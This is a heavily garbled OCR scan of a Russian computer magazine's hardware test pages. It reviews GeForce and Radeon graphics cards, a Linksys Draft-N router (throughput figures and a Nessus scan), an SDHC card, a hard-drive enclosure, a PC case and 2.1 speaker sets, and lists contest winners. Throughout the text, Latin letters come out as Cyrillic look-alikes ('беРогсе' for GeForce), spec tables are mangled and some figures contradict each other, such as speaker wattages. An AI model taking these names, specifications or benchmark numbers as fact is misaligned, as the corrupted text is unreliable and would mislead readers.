8800 Шга, особенно в версии от Місгозіаг (М5І), попавшей кнам на тест. 
Частоты, в отличие от референс-модели, весьма завышены, а на карту 
смонтирована угрожающая система охлаждения. Причиной высочайшей 
производительности платы являются отборные процессоры, тактиро- 
ванные на 660 МГц, и 0,8-нс чипы памяти, с легкостью работающие на 
феноменальной для ОБОРЗ частоте 2300 МГц. На объем тоже жаловаться не 
приходится — 768 Мбхватитза глаза для любых приложений, по крайней 
мере в ближайшие год-два. Немалый плюс — 384-битная шина памяти, 
существенно влияющая на производительность во всем спектре приложе- 
ний. Тесты это убедительно доказывают. Традиционно за лучшую произво- 
дительность мы присваиваем награду «Выбор редакции». 

0 

Но, как ни крути, несмотря на все достоинства и феноменальную произво- 
дительность, рекомендовать ее для покупки мы никакие можем. В самом 
ближайшем будущем выйдет семейство беРогсе 9, и, скорее всего, уже первые 
его экземпляры будут затыкать за пояс громоздкий 8800 Шга. Вряд ли он будет 
стоить дороже последнего, а по возможностям явно обойдетего на порядок. 



ипгеаІТоигпатепіЗ,4хАД, ІбхАР 



5.Т.А.І..К.Е.К., 4хАА, ІбхАР 




Тест в Шгеаітолько подтверждает общие результаты. 8800 Шга — вне 
конкуренции 
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РХ беРогсе 8800 0Т5 640МВІ 



$480 



Технические характеристики: 

Кодовое название: С80 
Кол ичество процессоров : 96 
Частота работы чипа: 500 МЩ 
Частота работы памяти: ІбОО МГц 
Тип памяти: 60йКЗ 
Объем памяти: 640 Мб 
Разрядность шины памяти: 320 бит 
Техпроцесс: 90 нм 



Технические характеристики: 

Количество процессоров: 320 
ШІЕтёп^рМбШШШ іірІ : 740 М Гц 

: І ИМИ1 

Тип памяти: бйОКЗ 
Объем памяти : 512 Мб 
Разрядность шины памяти: 512 бит 
рехпроцёсё: 80 нм 



О О 



О О 




Самая беспомощная жертва новомодного беРогсе 8800 6Т Классная в 
целом плата отбыстро завоевавшей популярность компании ХРХ. Произ- 
водительность достаточно высока, стабильна, весьма неплох потенциал 
разгона, даже в этой, стандартной версии. На плате применена турбинная 
система охлаждения, которая крайне эффективно справляется со своей 
задачей отвода теплого воздуха. Эта плата определенно заслуживает места 
в музее славы ІЧѴЮІА. 

Ѳ 

К сожалению, никаких шансов тягаться с перспективной беРогсе 8800 ѲТ 
у нее нет. Ни по цене, ни по производительности. Да, если ее хорошенько 
разогнать, можно сравнять результаты с показателями стоковой беРогсе 
8800 6Т, но на сколько-нибудь серьезный отрыв рассчитывать не прихо- 
дится. При этом никто не отменял оверклокерских возможностей 8800 6Т. 

А вот цена на беРогсе 8800 6Т5 снижается крайне неторопливо, и если уж 
приобретать эту модель, то только среди б/у, так как покупка новой абсолют- 
нолишена смысла. Производители это тоже понимают, и, скорее всего, в 
скором времени выпуск8800 6Т5 прекратится полностью. В нашем же тесте 
мы еще раз доказали превосходство нового чипа ЫѴЮІА над бестселлером 
прошлого года. 




И воту нас в руках очередной флагман линейки АМб/АТІ — видеоплата 
на базе чипсета Р600, Пасіеоп РЮ 2900 ХТ. Очевидно, что это стоковый 
вариант, соответственно, плата имеет минимум отличий от референс-ди- 
зайна. Однако штатная система охлаждения обладает одной интересной 
особенностью. Пластиковый короб несколько отдален от внутренней 
системы охлаждения и играет роль лишь накопителя теплого воздуха. Сам 
же пластик нагревается минимально. В первую очередь это важнотем, 
кто собирается строить систему из двух видеоплат, используя технологию 
СговБ-Ріге. Если установить две мощные платы АТІ Пасіеоп НО 2900 ХТ, они 
соприкоснутся пластиковыми поверхностями. Стоит отметить, что, если 
бы использовалась стандартная технология охлаждения, можно было бы 
серьезно опасаться за перегрев видеоплат, так как нагреваются они при 
сильной нагрузке весьма значительно. Но в данном случае температура 
внешнего пластика будет минимальна и никак не повлияет на работоспо- 
собность самой платы. 

Ѳ 

В тестах плата показала стабильные, но не рекордные результаты. Как 
видно из таблицы, ей было тяжело дотянуться даже до флагманов ЫѴЮІА 
из первых серий беРогсе 8. Учитывая, что скоро на смену беРогсе 8 придет 
новая линейка плат, этой модели от АТІ придется непросто. 



г ВЫВОДЫ 

Выбрать лучших было нетак просто. В общем и целом мы протестировали 
все актуальные на сегодняшний день видеоплаты среднего и высшего 
класса, б «Выбором редакции» все понятно — эту награду потрадиции 
получает модель, показавшая наилучшие результаты. Таковой в сегод- 
няшнем обзоре является беРогсе 8800 ІШга под редакцией Місгозіаг, 
значительно увеличившей штатные частоты видеоплаты. А вот приз 
«Лучшая покупка» с руками отхватывает перспективная модель беРогсе 



8800 6Т от ЕІі1;ебгои р. Безупречная производительность, демократичная 
цена, свежайший чипсет — это лучший выбор для современного компью- 
тера; видеоплата готова ко всем играм, в любых разрешениях. Если не 
заморачиваться постройкой максимально производительного компьюте- 
ра, лучше этой видеоплаты ничего не найти. 

РІовые Вабеоп от АТІ/АМб не разочаровали, они весьма интересны, цены 
на них также достаточно интересны, но по общим оценкам моделям от 
ЫѴЮІА они проигрывают, тг 
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ИГОРЬ ФЕДЮКИН 



ОБЗОР РОУТЕРА 



1_ШК5У51Л/КТ150Ы 



ПОЧЕМ ОКАЕТ N 



$125 



Стремительно приближается то время, когда мы, наконец, перестанем писать приставку БгаЙ 
и новый стандарт плотно закрепится в качестве единственно актуального. Сейчас уже доволь- 
но многие ноутбуки, построенные на платформе Іпіеі Запіа Коза, комплектуются интегри- 
рованным ѴѴі-Рі адаптером с поддержкой 802 .11п Эга Й 2 .0. Популяризация Эгай N девайсов, 
получивших совместимость друг с другом благодаря сертификации ѴѴі-Рі АШапсе, также 
способствует снижению цен на продукты. Наблюдаются попытки ряда вендоров выпустить 
интернет-шлюз с ѴѴі-Рі ОгаЙ N в ценовой категории около $100. Сегодня мы рассмотрим один 
из таких продуктов - Ілпкзуз ѴѴКТ1501М. 



В ВНЕШНИЙ ВИД И КОМПЛЕКТАЦИЯ 

В продолжение традиций последних моделей продуктов Ыпкзуз роутер 
выполнен в серебристо-черном корпусе. На передней панели находят- 
ся светодиоды активности сегментов І_АІ\І, ѴѴАЫ и ѴѴІ_АЫ, индикаторы 
питания, статуса устройства и активности функции ІР5. На тыльной 
стороне находятся: кнопка сброса, порты І_АІЧ и ѴѴАІЧ, разъем питания и 
две антенны с коэффициентом усиления 3 бВі. На крышке располагается 
кнопка, помеченная как«Резегѵесі». На деле она отвечаетза функцию 
автоматической настройки параметров ѴѴі-Рі - ѴѴР5 (доступна в версиях 
прошивки начиная с 1 .52.0). Комплектация устройства стандартна: краткая 
инструкция поустановке, компакт-диск с утилитами и полным мануалом, 
патч-корд и адаптер питания. К слову, на коробке от роутера имеется 
надпись о том, что продукт совместим только с первой версией ОгаЛ ІЕЕЕ 



802.1 1 п. В действительности обе аппаратные версии модели ѴѴРТ1 50Ы уже 
прошли сертификацию ОгаЙ N 2.0. 

^ ФУНКЦИОНАЛЬНЫЕ ВОЗМОЖНОСТИ 

Роутер может работать как в качестве интернет-шлюза, так и в режиме 
классической маршрутизации третьего уровня. В последнем случаетребу- 
ется отключить ЫАТ в настройках АбѵапсесІ Роиііпд. 

На ѴѴАЫ-интерфейсе роутера доступно использование статических на- 
строек ІР, автонастройка с ОНСР-сервера или использование протоколов 
РРРоЕ, РРТР и І_2ТР. При настройке РРТР/І_2ТР возможно задание ІР- 
адреса сервера только в виде ІР. При активации ѴРЫ-соединения теряется 
доступ ко внутренним ресурсам провайдера. И хотя присутствует возмож- 
ность занесения статических маршрутов втаблицу маршрутизации, они 
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Технические характеристики 

Интерфейсы: ІхѴѴАМ (Е.І-451 10/1 00 Мбит/сек, 4хІ_АЫ (РО-45) 1 0/1 00 Мбит/сек 
Беспроводная точка доступа ѴѴІ-РІ: I ЕЕЕ 802.1 1 Ь/д + ЭгаН N (до 300 Мбит/сек] 
Безопасность: МЕР (до 1 28 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К (ТКІР/АЕ5І, 
поддержка РАОІІІ5 

Функции роутера: ІМАТ/ІМАРТ, ОупОІМБ, ОНСР, Біаііс Роибпд, 0о5 
Функции файрвола: 5РІ, Оотаіп/Кеуѵѵогб Еіііег 




игнорируются роутером при активном ѴРЫ-соединении. 

Имеется поддержка протокола І6МР. Однако мульти кастовые потоки 
корректно маршрутизируются только в режиме 5іаІіс ІР или Аиіотабс 
сопбдигабоп. В режимах с применением протоколов РРРоЕ, РРТР и 
І_2ТР пользоваться тиШсазІ-сервисами (такими как, например, ІРТѴ) не 
получится. 

Параметры фильтрации сокращены до возможности ограничить доступ 
локальных пользователей определенным сервисам в интернете (по 
ІІРІ_, ключевым словам или номеру порта). Также доступно включение/от- 
ключение БРІ-файрвола, фильтрации ІСМР-запросов, мультикастового 
трафика. 

В отличие от некоторых других устройств марки Ыпкзуз, ѵѵеЬ-интерфейс 
довольно шустрый. Изменение большинства настроек проходит на лету. 
Функции перезагрузки роутера вообще кактаковой не имеется. Перво- 
начальная загрузка (с момента включения питания до первого ответа на 
пинги) проходит менее чем за 1 0 секунд. 

^ МЕТОДИКАТЕСТИРОВАНИЯ 

Все измерения проводились с прошивкой версии 1.51.3. 

1 . При тестировании пропускной способности ѴѴАЫ І_АЫ одна из 
станций подключалась к одному из портов свитча (интерфейс І_АІЧ), 
вторая - к ѴѴАЫ-порту. Таким образом мы получали пиковую пропускную 
способность для ѴѴАЫ-интерфейса (также ее можно назвать скоростью 
N АТ) . Измерялась скорость однонаправленной передачи (направления 
ѴѴАЫ -> І_АЫ и І_АЫ -> ѴѴАЫ) и в режиме полного дуплекса (РОХ). Кроме 
того, мы провели дополнительный замер при отключении работающего 
по умолчанию 5РІ -файрвола. 

2. Поскольку при активации интернет-соединения по протоколу РРТР 
создается дополнительная нагрузка на центральный процессор роутера, 
мы измерили пропускную способность РРТР. Для этого за ѴѴАЫ-интерфейсом 
маршрутизатора был поднятѴРЫ-сервер. Также проверялась возмож- 
ность установки ѴРМ-соединения в случае размещения ѴРЫ-сервера 
вне сегмента нахождения нашего маршрутизатора. 

3. Для оценки скорости ѴѴі-Рі мы использовали РСМСІА-адаптер Ыпкзуз 
ѴѴРС4400Ы. Измерения проводились втипичной квартире из двухточекс 
разным удалением от роутера. В первом случаеудаление не превышало 1 м 



и, как следует, измерялась максимальная скорость передачи данных. 
Во втором случае ноутбук с ѴѴі-Рі адаптером находился на расстоянии 
1 0 м отточки доступа по диагонали за стеной. Для того чтобы оценить 
скоростные потери при активации шифрования мы сделали два заме- 
ра: без его использования и с применением алгоритма ѴѴРА-Р5К. 

4. В качестве дополнительного исследования была проведена проверка 
на уязвимости со стороны ѴѴАЫ-интерфейса с помощью программного 
продукта ТепаЫе Ыеззиз. Сканирование проводилось в двух режимах: с 
включенным и выключенным файрволом. 

^ РЕЗУЛЬТАТЫ ТЕСТОВ 

Пропускная способность ѴѴАЫ -интерфейса у Ыпкзуз ѴѴПТ1 50 N в 
режиме ЫАТ в направлении ѴѴАЫ ■> І_АЫ составляет 69,44 Мбит/сек, в 
обратном - 73,1 Мбит/сек, а при одновременной передаче в обе сторо- 
ны — 69,41 Мбит/сек. В случае отключенного файрвола производитель- 
ность немного увеличивается. В направлении ѴѴАЫ І_АЫ скорость 
поднимается до 73,36 Мбит/сек, в обратном — до 76,87 Мбит/сек, а при 
одновременной передаче в обе стороны — до 76,65 Мбит/сек. 

К сожалению, традиционно для большинства роутеров ЫпквуБ пропускная 
способность РРТР-туннеля невелика. Во всех случаях она не превышает 
9 Мбит/сек. 

Переходим ктестам ѴѴі-Рі. В этот раз мы решили привести результаты 
скоростных замеров с использованием шифрования и без него. Безу- 
словно, довольно интересно, насколько велик выигрыш в скорости у сети 
с открытым ключом. Однако хочется отметить, что в данном случае мало 
того, что перехват данных не представляет ни малейшей сложности, 
отсутствие какой-либо аутентификации позволяет подключаться к сети и 
пользоваться ее ресурсами всем желающим. Многие заблуждаются, что 
можно защититься с помощью ограничения доступа по МАС-адресам. 
Выяснить МАС-адреса, разрешенныеточкой доступа, и подменить свой 

— минутное дело. 

Без шифрования на расстоянии 1 м скорость ѴѴі-Рі находится на очень 
высоком уровне: в направлении АР РС (отточки доступа кадаптеру) она 
составляет 43,32 Мбит/сек, в направлении РС -> АР (отадаптера кточке) 

— 58,14 Мбит/сек, при передаче в обе стороны — 71 ,01 Мбит/сек. С ѴѴРА- 
РБК шифрованием показатели существенно меняются: АР РС — 39,54 
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Мбит/сек, РС АР — 35,78 Мбит/сек, при одновременной передаче 

— 39,87 Мбит/сек. 

На расстоянии 1 0 м скорость незначительно падает, но остается на вполне 
приемлемом уровне. Без шифрования: АР -> РС — 35,24 Мбит/сек, РС -> АР 

— 49,41 Мбит/сек, при одновременной передаче — 68,93 Мбит/сек. С ѴѴРА- 
Р5К шифрованием: АР -> РС — 33,52 Мбит/сек, РС-> АР — 38,36 Мбит/сек, 
при одновременной передаче — 31 ,44 Мбит/сек. 

Сканирование вТепаЫе Ыеззиз не выявило у роутера ни одной уязвимо- 
сти, что говорито его достаточно хорошей защищенности. 



добротным продуктом при невысокой стоимости. К его достоинствам 
следует отнести высокую производительность ЫАТ, сравнительно 
неплохую скорость ѴѴі-Рі и соответствие нормам сертификации ѴѴі-Рі 
АШапсе 802.1 1 п ОгаІН 2.0. РІельзя, конечно, не отметить и ряд недостатков 
— довольно низкую скорость РРТР и некорректную работу статической 
маршрутизации в случае использования протоколов РРТР/І_2ТР. Однако, 
так как ряд производителей уже научился устранять подобные недочеты 
программным путем, можно предположить, что Ыпкзуз сможет войти в их 
число. ІНІ 



г ВЫВОДЫ 

Время идет и технологии становятся доступнее. В ближайшем будущем 
можно ждать появления Б га К: N роутеров по цене около $1 00. Ыпкзуз 
ѴѴРТ1 50Ы приблизил этот момент еще немного, оказавшись на деле 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ 
НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКОМУ ПРЕДСТА- 
ВИТЕЛЬСТВУ КОМПАНИИ ЫЫК5Ѵ5 



Пропускная способность Ѵ/АЫ-интерфейса 




На графике представлена пропускная способность в трех режимах: с ис- 
пользованием протокола РРТР и в режиме Зіаііс ІР (МАТ Опіу) с файрволом 
и без него 



Скорость \Ѵі-Рі с шифрованием и без 




| Ѵ9РА-Р5К 
| N0 Бесигііу 






Отключение шифрования дает существенный скоростной бонус. 



Скорость ѴѴі-Рі (максимальная длинна пакета) 




Скорость ѴѴі-Рі (минимальная длинна пакета) 



0.1 0.2 



0.5 0,6 0,7 0,8 0,9 






Скорость ѴѴі-Рі при передаче пакетов минимального размера 
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СРЕАТІѴЕ 

С0ЫТЕ5Т: 

ИТОГИ 

КОНКУРСА 



В декабрьском номере 



Сгеагіѵе СопЕеэЕ, в котором разыгрыва- 



юсь три классные а 



Сгеагіѵе. Спустя два месяца мы подводим 



В ЭТОТ РАЗ УДАЧАУЛЫБНУЛАСЬ САМЫМ ШУСТРЫМ ЧИТАТЕЛЯМ ][, КОТОРЫЕ РАНЬШЕ ОСТАЛЬНЫХ 
КУПИЛИЖУРНАЛ И НАШЛИ ПРАВИЛЬНЫЕ ОТВЕТЫ НАВОПРОСЫ КОНКУРСА. 



Итак, первое место и колонки бідаѵѵогкз Т40 присуждаются московскому читателю Вовану«Ри%_0» Иванову, 



второе место и бідаѵѵогкз Т20 — Алексею Короткину из Твери; 
а третий приз, ІпзрігеТІО, уходит парню с ником І_агуВопе из города Химки. 



СРЕАТІѴЕ' 






I 



4деваиса= 




(^шпо 5БНС Сагсі 
8СЫ50Х 

Емкая карта для обладателей 
мобильной техники 



$130 

• яг 





Технические характеристики: 

Тип карты: 5йНС 
Скоростная формула: 150Х 
Объем: 8 Гб 

Срок службы: 10 000 циклов перезаписи 

Вес, Г: 2 




1. Карта нового распространенного формата, который используется в 
фотоаппаратах, видеокамерах, плеерах, мобильныхтелефонах. Но перед 
покупкой Оито 8 6Ь обязательно ознакомься с руководством пользователя 
твоего цифрового устройства на предметсовместимости картформата 
50НС с этим девайсом. 

2 . Высокая емкость пригодится при дальних путешествиях или длительной 
записи видео. 

3. Высокая скорость чтения позволитбыстро скопировать накопившийся 
материал на компьютер. 

4 . Карта поддерживается всеми устройствами: от кардридеров до телефо- 
нов, которые рассчитаны на работу с картами стандарта 50НС. 

5 . Средний цифровой фотоаппарате матрицей 8 Мпикс и максимальными 
установками качества изображения сохраняет на такой карте более 2200 
снимков. Оченьхороший результат. 

6 . Яркий дизайн привлекает взгляд. 

0 

1. Скорость записи мала для быстрого переноса большого объема 
информации. 

2 . Время доступа случайного чтения показалось слишком значительным 

- могут быть заметны задержки при чтении большого количества маленьких 
файлов. 

Результаты тестирования: 

Ыпеагѵѵгіію - 5, 13 Мб/с 
Аѵегаде ѵѵгііе- 0,02 мс 
1_іпеаг геасі - 17,2 Мб/с 
Аѵегаде геасі ассезз - 0,72 мс 



Технические характеристики: 

Интерфейс с компьютером: 115В 2.0 
Жесткие диски: 2,5" АТА 
Питание: не требуется 

Габариты, мм: 128x77x16 




1. Внешние накопители на базе 2, 5-дюймовыхжестких дисков получают 
большое распространениеза счет большого объема и низкой цены. 

2 . Корпус выполнен из металла, благодаря чему площадь рассеивания 
тепла велика. 

3. Перфорация на передней стенке кейса выполняет не только декоратив- 
ные функции, - вентиляция позволяет соблюсти температурный режим. 

4 . Синий светодиод демонстрирует рабочее состояние винчестера. 

5 . Подключение осуществляется по шине 115В, питание также поступает 
по шине. 

6 . В случае нехватки тока одного порта можно подключиться ко второму 
благодаря разветвителю. 

7 . Высокая скорость чтения и записи позволяют использовать девайс как 
альтернативу флеш-драйвам. 

8 . Устройство не требует дополнительно го питания, хотя разъем для под- 
ключения адаптера присутствует. 

9 . В случае проблем с устройством перегрузка осуществляется специаль- 
ной кнопкой. 

0 

1. Для крепкой фиксации платы и жесткого диска придется закрутить 
восемь болтов. 

Результаты тестирования: 

Аѵегаде Неаб Асееве - 18,9 мс 
ВиТСегеб Пеаб - 21,8 Мб/с 
Папбот Неаб - 20,1 Мб/с 
Ііпеаг РеасІ - 22,4 Мб/с 
Аѵегаде ѴѴгіІе Ассе55 - 7,87 мс 
РапсІотѴѴгігІе- 24,4 Мб/с 
І_іпеаг\Л/гіІе- 27,1 Мб/с 
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ІгЬіпкѴЗ 

Система управления компьюте- 
ром с ПДУ 




Технические характеристики: 




Техническиехарактеристики: 

Тип корпуса: РиІІТоѵѵег 

Материал корпуса: алюминиевый сплав 6063 Т5 
Форм-фактор: АТХ/МісгоАТХ/РІехАТХ/ІТХ 

Блок питания (в комплекте): нет 
Габариты, мм: 522x202x475 
Вес, кг: 10,7 




Выходы : БАТА, ІЕЕЕ 1394. Зх 115В, 5-1 аисііо 

Поддержка флеш-карт: СР, 5М, хй, БР/ММС, МБ 

Интерфейс с компьютером : требуется подключение к аудиокарте, БАТА, 
115В, тоіех 




1. Устройство встраивается в свободный слот панели 5,25" и имеет кабели 
достаточной длины для подключения внутри компьютера. 

2. На панель выведено большое количество портов, есть возможность 
подключения многоканальной акустической системы. 

3. Владельцев цифровой техники, использующих в качестве носителей 
флеш-карты, порадует наличие кардридера. 

4. Управление компьютером осуществляется с пульта дистанционного 
управления, идущего в комплекте. 

5. Программное обеспечение, входящее в комплектацию, общается стобой 
на русском языке. 

6 . Для управления компьютером подойдет любой ПДУ - система легко 
настраивается. 

Ѳ 

1. Передняя панелька сделана из невзрачного серого пластика, который не 
будет смотреться в дорогом корпусе. 

2. Для подключения всех выходов в тесном корпусе придется приложить 
немалыеусилия. 

3. Выход 5АТА пригодится для подключения жестких дисков, но кабель 
питания придется тянуть из системного блока. 



ТЕ5Т_ЬАВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ 
НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИЯМ МІЛ-ТІМЕОІА 
СІЛІВ (Т. (495) 788-91 1 1 , ѴѴѴѴѴѴ.МРС.КІЛ , ЫЕООРСШР (Т. (495) 
737-3925, ѴУѴУѴУ.ЫЕО.КІЛ, ПШИК (ѴѴѴѴѴѴ.ІРЫЫК.Ки), АТАКЖЕ 
РОССИЙСКОМУ ПРЕДСТАВИТЕЛЬСТВУ КОМПАНИИ НІРЕК 




1. Стильный, интересный дизайн. Выполненный в элегантных черных 
тонах с вкраплениями серебристых элементов, он, безусловно, выделяется 
на фоне стандартных серых коробок обыкновенных системных блоков. 

2. Корпус прочен и надежен. Он изготовлен из алюминиевого сплава, 
имеющего хорошуютеплопроводность, столщиной панелей 3 мм. Стоит 
сказать и о креплениях боковых стенок. Застежки нестандартные, очень 
надежные и удобные, легко открываются и закрываются. 

3. Передняя панель является ложной и представляет собой дверку с проре- 
зями для вентиляции, закрывающуюся на две магнитные застежки. За ней 
находится стенка корпуса, а также «вакантные места» для флоппи-дисково- 
да и шести оптических приводов. 

4. «Панельуправления» не расположена на передней стенке, каку боль- 
шинства стандартных корпусов, а встроена в радиатор на верхней грани. 
Кроме кнопки включения питания и перезагрузки она содержитеще и два 
разъема 115В 2.0, входы для наушников и микрофона, атакже линейный 
вход. 

5. Одна из боковых стенок сделана прозрачной, что даетлюбителям мо- 
динговых штучекбольшой простор для фантазии в делеукрашения своего 
компа. 

6 . В центре верхней панели корпуса есть дополнительное вентиляционное 
отверстие с уже установленным кулером - очень полезное дополнение, 
если учесть, что боковая панель вообще не имеет отверстий для свободного 
доступа воздуха. 

0 

1. Вес более 10 кг все-таки великоват даже для такого корпуса. 

2. Обязательна установка кулера перед отсеком для ГЮй - иначе при их 
большом количестве они будутсильно нагреваться. 

3. Верхняя панель выполнена в виде радиатора, что, конечно, красиво и 
необычно, однако немного непрактично - в щели будет набиваться пыль. 
Правда, именно для чистки верха корпуса в комплекте идетспециальная 
щеточка. 
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ГРОМКО 
И КРАСИВО 

ТЕСТИРУЕМ 2.1-СИСТЕМЫ 
«ДИЗАЙНЕРСКОЙ» АКУСТИКИ 



ФЕДОР ПОНАРОВСКИЙ 



Стереотипы о том, как должна вы- 
глядеть качественная акустика, 
явно устарели. Во всяком случае, 
на рынке недорогого домашнего 
звука уже давно появился целый 
класс устройств, которые по вне- 
шнему виду никаким образом 
не вписывается в стандартные 
представления о дизайне и ком- 
поновке мульмедийных звуковых 
систем. Интересно только одно: 
насколько качественный звук 
способны выдавать эти «дизай- 
нерские» колонки? 

одоплека тенденции простая. Существует целый пласт 
пользователей, заинтересованных в приобритении 
устройств, которые позволят им украсить свой дом и вы- 
пендриться перед друзьями. Покупая колонки за $1 00, 
рассчитывать на Ні-ЕпсІ звучание им не приходится, и на первое 
место выходит экстерьер. Производители же всегда заинтересованы 
в росте продаж своего оборудования и хотят охватывать интересы 
максимального числа потребителей. Поэтому в ответ на спрос и 
появилась категория «дизайнерской» акустики. 

Самое интересное тут — это насколько хорошо эти колонки справля- 
ются с основной задачей, качественно ли они звучат, не пошли лив 
ущерб звуку их яркая внешность и необычная компоновка? 

Чтобы ответить на этот вопрос, мы взяли три модели, которые как 
нельзя лучше представляют категорию «дизайнерской» акустики: 
ЛЗІ_ Зруго, ЕсІИчег Е3350 и ЛЗІ_ Сгеаіиге 2, и подвергли их придирчи- 
вому тестированию. 



□ 



■ШЬБруго 



• Сате л л иты 1 6 Вт на канал 

'•Сабвуфер: 24 Вт| 

•Махе, риал сатахілщб&: й'са^ву.фера : пластик 
>=8оЩБ 

•Воспроизводимый частотный диапазон: 40 Гц- 20 КГц 
•Сопротивление: 5 кОм 

•Сенсорное управлениеуровнем громкости Еазу-Іо-ІІзеТоисЬ Ѵоіите 

—| 

•Встроенная система памяти последних настроекзвучания 

Ірес : 2 ,8кГ 

•Размеры : 

ЛЗІ_ — американская компания, которая существуетуже больше 50 лет и 
все это время радует меломанов по всему миру классным звуком. Сейчас 
ЛЗІ_ входит в состав крупного холдинга Наггпап I пЕегпаІіопаІ и по-пре- 
жнему уделяет много внимания научным изысканиям, постоянно отыски- 
вая свежие инженерные решения для улучшения своих аудиосистем. Так 
что опыта в проектировании и производстве звуковых систем компании 
ЛЗІ_ не занимать. 

ЛЗІ_ Зруго — модель с весьма необычными сателлитами, которые могут 
прийтись по вкусу любителям нестандартно выглядящих вещей. По мощ- 
ности этот комплект акустики практически полностью идентичен пре- 
дыдущей модели, за исключением сателлитов — они стали чуть слабее 
и выдают по 6 Вт ПМ5 против 8 Вту Сгеаіиге II. Звук вцелом порадовал 
своей гармоничностью и жизнерадостностью, музыкальные инстру- 
менты узнаваемы и не забивают друг друга. При увеличении громкости 
наблюдается рост нелинейных искажений, преобладающих на средних 
частотах, однако они носят вполне допустимый для акустики такого 
класса характер. Из-за широкой диаграммы направленности сателли- 
тов существуют определенные проблемы с глубиной сцены, при этом, 
правда, нет проблем с размещением колонок. Сабвуфер, в принципе, 
больших вопросов не вызвал, он хорошо справляется со своей задачей, 
однако при большой громкости отчетливо слышны искажения — неболь- 
шой «хрип». При средней же громкости звука он отлично выполняетсвою 
работу. 

Многим пользователям придется по вкусу инновационный дизайн ЛЗІ_ 
Зруго, при этом, смею предположить, что они не будут разочарованы и ка- 
чеством звучания системы. Набор показал в целом гармоничную работу, 
и если бы производитель больше внимания уделил сабвуферу, то набор 
заслуживал бы самых лестных отзывов. 
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л ІДЩДД 

• Сателлиты : 9 Вт на канал 
ВМИМИ : 32 Вт 

• Материал сателлитов и сабвуфера: пластик 

• Соотношение сигнал/шум: >=85дБ 

• Воспроизводимый частотный диапазон: 30 — 130 Гцісабвуфері ,190 Гц 
ОЩЩ (сателл иты) 

•Динамики: 5" сабвуфер, 3" драйвер средних частот и 3/4" высокочас- 
тотныйтвитер 

•Отдельная настройка басов на сабвуфере 

• Сетевой адаптер на входное напряжение 100-240 В в комплекте 



ВІ_ Сгеаіиге II 



: 40 Вт(КМ 5 ] 

• Сателл иты : 8 Вт на каЦЛ 

•Сабвуфер: 24Вт; 

• Материал сателлитов и сабвуфера: пластик 

ііШшМиІ- іЖШёШ’ШШ/ШШі: >= 8 одБ 

•Воспроизводимый частотный диапазон: 50-180 Гц (сабвуфер), 180 Гц 

— 2оКГц (сателл иты) 

•Динамики: металлическая 1 " мембрана в сателлитах и 

рілиннбхрдный 4 Р 5 " динамик в сабвуфере 

• С е н со р н о е у п ра в л е н и ё ТоисН Ѵоіи те Со пТгоК 



На выставке СЕВ 2008, которая проходила в Лос-Анджелесе, одним из лау- 
реатов стала мультимедийная акустическая система Есіібег Е3350, которую 
наградили дипломом Оезідп & Епдепеегіпд Вбоѵѵсазе Нопогз 2008. 
Получениетакой высокой оценки на одном из самых авторитетных мировых 
хайтек-ивентов лишний раз подтверждает, что производство ярких дизай- 
нерских решений для фирмы Есіібегне в новинку, и, несмотря на смелые 
эксперименты дизайнеров, инженеры компании не идут на компромисс с 
качеством звука. 

Основное отличие новых колонок от предыдущей модели Е3300 — это новая 
форма сателлитов, они стали больше, итеперьтам установлены более 
мощные динамики —по 9 Вт. Также инженеры Есіібег разработали новую 
конструкцию для высокочастотныхтвитеров: теперь они выполняются из 
шелка и имеют куполовидную форму и диаметр 3/4 дюйма. 

Сабвуфер, который по форме напоминает пирамиду, выполнен из 
специальных антирезонансных материалов и оснащен пятидюймовым 
направленным вниз динамиком мощностью 32 Вт. Система комплектуется 
вынесенным регулятором звука с гнездами для подключения внешних 
устройств, а уровень басов можно регулировать отдельно на сабвуфере. 
Звучание системы для комплекта такого класса впечатляет. Звук воспро- 
изводится четко и без вранья, инструменты легко узнаваемы и не забивают 
друг друга. Акустике та кого класса обычно свойственна легко узнаваемая 
резкость среднечастотных компонентов, особенно при прослушивании 
сжатой в гпрЗ музыки на близкой к максимуму мощности. Очень радует, 
что у Есіібег Е3350 этот эффект не слишком заметен, и большинство людей 
воспримутего скорее как плюс: звучание Е3350 покажется им четким, соч- 
ным и ярким. Что касается высоких частот, тут все супер. Благодаря новому 
куполовидному твитеру из шелка спад на высоких частотах практически 
отсутствует, что делает звук более насыщенным. 

Есіібег Е3350 — отличный набор акутики, который мы можем смело рекомен- 
довать всем читателям. Система продемонстировала отличное звучание и 
сбалансированную работу даже на большой громкости, а работа сабвуфера 
вызвала отдельный восторг глубиной амплитуды на «низах» в районе 50 Гц. 
За все это и даем приз «Выбор редакции». 



ЗВІ_5руго — этотрехкомпонентная мультимедийная акустическая система, 
по мощности уступающая Есіібег Е3350, однако выступающая втомже 
самом классе «дизайнерской» 2.1 -акустики. 

Компоненты системы — сателлиты и сабвуфер — по форме напоминаютто 
ли колокола, то ли какие-то экзотические цветы — кому что ближе. В любом 
случае выглядитсистема эффектно, да и звучит не хуже. Звук натуральный, 
звонкий, сочный и полный, с насыщенными высокими частотами. 

Но работа сабвуфера вызвала несколько вопросов и нареканий. При 
увеличении громкости он начинает вполне конкретно хрипеть, также пока- 
залось, что сабу не хватает амплитуды на «низах» и частоты в районе 50 Гц 
воспроизводятся очень слабо, практически не ощущаются. 

Используемая технология цифрового управления звуком Тоисб Ѵоіите 
Сопігоі позволяетустанавливать уровень звука с дискретным шагом при 
помощи удобных сенсорных элементов управления. 

Плавное отключение звука (Миіе) осуществляется одновременным каса- 
нием обоих сенсоров, что показалось очень удобным. Единственное, при 
использовании этих сенсорных элементов из колонок доносятся вполне 
слышимые щелчки, что расстроило. Причем, судя по отзывам на форумах, 
это свойственно не конкретной тестируемой модели, а абсолютно всем 
устройствам. 

В целом ЗВІ_ СгеаШге II — неплохой набор акустики за свои деньги, 
который гармонично звучит и отлично выглядит. В классе акустики, где на 
первом месте стоит дизайн и внешний вид, — неплохое приобретение. 

Выводы 

Изтрех протестированныхзвуковых систем позвучанию мнебольше всего 
понравился набор Ебібег Е3350 — звукуэтой системы более мощный и 
сбалансированный, за эти качества мы и наградили колонки от Есіібег. 
